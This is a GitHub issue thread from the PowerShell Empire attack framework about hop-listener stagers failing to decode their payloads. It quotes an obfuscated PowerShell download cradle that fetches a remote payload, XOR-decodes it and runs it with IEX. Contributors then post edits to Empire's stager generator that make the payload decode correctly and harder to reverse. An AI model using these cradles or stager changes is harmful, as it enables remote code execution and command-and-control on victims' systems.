### ISSUE TITLE
Stager not decoding properly with hop listener

### ISSUE THREAD

**Issue by 0x6d6178** [PowerShellEmpire/Empire#221] opened 2016-05-11 11:01 UTC
## Empire Version
1.5.0

## OS Information (Linux flavor, Python version)
Kali roling
(uname -a) Linux crystal 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-5kali4 (2016-01-13) x86_64 GNU/Linux
(python --version) Python 2.7.11+ 

### Expected behaviour
To set up a hop listener, is followed the instructions given at http://www.powershellempire.com/?page_id=102#hop-listeners. In short, how I understood the instruction: create 2 listeners, 1 native and 1 hop. Generate the hop stager with the native listener, all other stagers are generated for the hop listener. 

Setting this up, the native listener would get the 'Host' option set to the local listening host (the host not exposed to the agent), the hop listener has the 'Host' option configured to the URL where the hop.php is hosted. Additionally, the 'Type' of the second listener is set to 'hop' and the 'RedirectTarget' option is set to the same value as the 'Host' option of listener 1.

It is expected that when generating launchers (eg. bat or vbs) for listener 2, the communication is routed via the hop.php to the actual native listener (listener 1).

### Observed error
The payload received by the stager is not properly decoded. The generated stager tries to decode the payload by bitwise xor'ing the received data, however, the data is base64 encoded and needs to be base64 decoded. 

### Possible fix
I tested changing the decoding from `|%{$_-BXor$k[$I++%$k.LEnGtH-1]};` to `[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($B));` this fixes the error and successfully sets up the agent (not sure if this is the shortest/smallest fix possible).

## Screenshot of error, embedded text output, or Pastebin link to the error
The observed error message is:
```
Invoke-Expression : Missing closing ')' in expression.
At E:\a.ps1:1 char:506
+ $WC=NeW-OBJEcT SySTEM.Net.WebCLIent;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; T
rident/7.0; rv:11.0) like Gecko';$Wc.HeaDERS.ADD('User-Agent',$u);$wc.PROXy = [
SYsTEM.NET.WEBRequEST]::DEFauLtWeBProXY;$Wc.PRoXY.CreDeNTIalS = [SySTEM.NET.CrE
dENtIalCache]::DEFauLTNeTworkCREDenTIaLs;$K='|P#5zWhxCOBbKSN/76VkQUvtoHI$qpnE';
$i=0;[ChAr[]]$b=([cHaR[]]($wC.DOWnLOAdStriNg("<snip>")))|%{$_-BXor$k[$I++%$K.LeNGt
H]};Write-Verbose ($b-join'');IEX <<<<  ($b-jOin'')
    + CategoryInfo          : ParserError: (CloseParenToken:TokenId) [Invoke-E
   xpression], ParseException
    + FullyQualifiedErrorId : MissingEndParenthesisInExpression,Microsoft.Powe
   rShell.Commands.InvokeExpressionCommand
```
The error message may vary, since IEX is trying to interpret the improperly decoded expression. 

## Any additional information
Not at this time. Will try to submit a pull request if possible, don't know how far down the rabbit hole this issue goes.

**Comment by HarmJ0y** [comment] 2016-05-12 08:01
Thanks for the catch, we'll try to check this out soon.

**Comment by GILoe** [comment] 2016-06-02 09:23
For Empire 1.5 the issue is @ lib/common/stagers.py @ function generate_agent_hop() (@ lines 156-164).
While the encode and encrypt parameters are both defaulted to True, in the code, the randomizedStager, is EITHER encoded to Base64 OR encrypted with the AES key, not both, in a 'if-elif-else' block.
Actually, the way the if-block is set, randomizedStager is only encoded, due to the if-block being structured to check the 'encoded' 1st returning and exiting the function afterwards:

        # base64 encode the stager and return it
        if encode:
            return helpers.enc_powershell(randomizedStager)
        elif encrypt:
            # return an encrypted version of the stager ("normal" staging)
            return encryption.xor_encrypt(randomizedStager, key)
        else:
            # otherwise return the case-randomized stager
            return randomizedStager

One quick solution is to include the extra powershell line, user @0x6d6178 suggested, for Base64 decoding of the payload. The proper place for it would be at the same file, function  generate_launcher(), lines 346 and 351, replacing the " |%{$_-BXor$k[$I++%$k.LEnGtH-1]} "

**Comment by HarmJ0y** [comment] 2016-07-15 22:08
@GILoe - thanks for the detailed run down! This should hopefully be fixed with https://github.com/PowerShellEmpire/Empire/commit/7c5a07581d6fd7d40c7b41dca74324c8360868eb . I'm going to close this for now (please reopen if it's still an issue).

Concerning the "long" fixes - EmPyre/Empire are likely going to have their codebases combined post BlackHat/DEF CON timeframe, so we will revisit a better fix for the issue at that point.

**Closed by HarmJ0y** 2016-07-15 22:08 UTC

**Comment by GILoe** [comment] 2016-07-25 06:59
The long fix was actually implemented, before the time I did that post.
I chose not to post it though, as I was not certain, if this solution is
compatible to your logic, at least to post it publicly.
Nevertheless, the functional fix I have implemented, I believe, is closer
to your logic, that of the original code design, to say so in private.

Having the option to encrypt, encode, or BOTH, as far as the code is
concerned, I changed the if-elif-else block, to two seperate if blocks.
Since it is much safer to commmunicate in encoded Base64, if both options
are set to TRUE, the payload is firstly encrypted, and then Base64 encoded.
The code itself is as follows:

@ lib/common/stagers.py @function generate_agent_hop(), ~line 130 and @
function generate_agent(), ~line 80, replacing the:

"""
# base64 encode the stager and return it

    if encode:
        return helpers.enc_powershell(randomizedStager)
    elif encrypt:
        # return an encrypted version of the stager ("normal" staging)
        return encryption.xor_encrypt(randomizedStager, key)
    else:
        # otherwise return the case-randomized stager
        return randomizedStager

"""
with:
"""
        # encrypt the stager ("normal" staging)
if encrypt:
            randomizedStager = encryption.xor_encrypt(randomizedStager, key)
# base64 encode the stager and return it
        if encode:
            randomizedStager = helpers.enc_powershell(randomizedStager)

        # return the stager with any changes on it
        return randomizedStager
"""
allows any combination of values in 'encrypted' and 'encoded' returning the
appropriate output.
On the receiving end, for proper 'translation' of the payload, the extra
powershell line is added:
@lib/common/stagers.py ~line 346 and ~line 351

replace the:
"""
stager += helpers.randomize_capitalization("\")))|%{$_-bXor$k[$i++%$k.Length]};IEX
($b-join'')")
and
stager += helpers.randomize_capitalization("\")))|%{$_-bXor$k[$i++%$k.Length]};IEX
($b-join''); $R=0;}catch{sleep "+str(defaultDelay)+";$R--}} while ($R -gt 0)
")
"""
with:
"""
stager +=
helpers.randomize_capitalization("\")));$e=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($c));[char[]]$b=[char[]]$e|%{$_-bXor$k[$i++%$k.Length]};IEX
($b-join'')")

and:

stager +=
helpers.randomize_capitalization("\")));$e=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($c));[char[]]$b=[char[]]$e|%{$_-bXor$k[$i++%$k.Length]};IEX
($b-join''); $R=0;}catch{sleep "+str(defaultDelay)+";$R--}} while ($R -gt
0)")
"""

Of course, that requires a change in the default values of 'encrypt' and
'encode' to both being set TRUE, but as that seems a safer approach, more
reliable transfer and more complicated to reverse, this small change, I
think, is worth it.
A more strict control over the parameters 'encrypted' and 'encoded' these
functions accept, to always match and ensure integrity, could solve the
problem of adding or removing to the powershell one-liner, with the same
'two-if-blocks' manner, but that requires a lot more 'messing up' with the
original code.

Please forgive the long post, hope this helps with the code revamp you plan
to do.

Thank you for time, reading this.
With regards.

PS: Did I mention I am a fun of your work at your blog ? Long before the
powershellempire project, the Powertools collection, was a great
inspiration, for many things.


2016-07-16 1:08 GMT+03:00 HarmJ0y <notifications@github.com>:
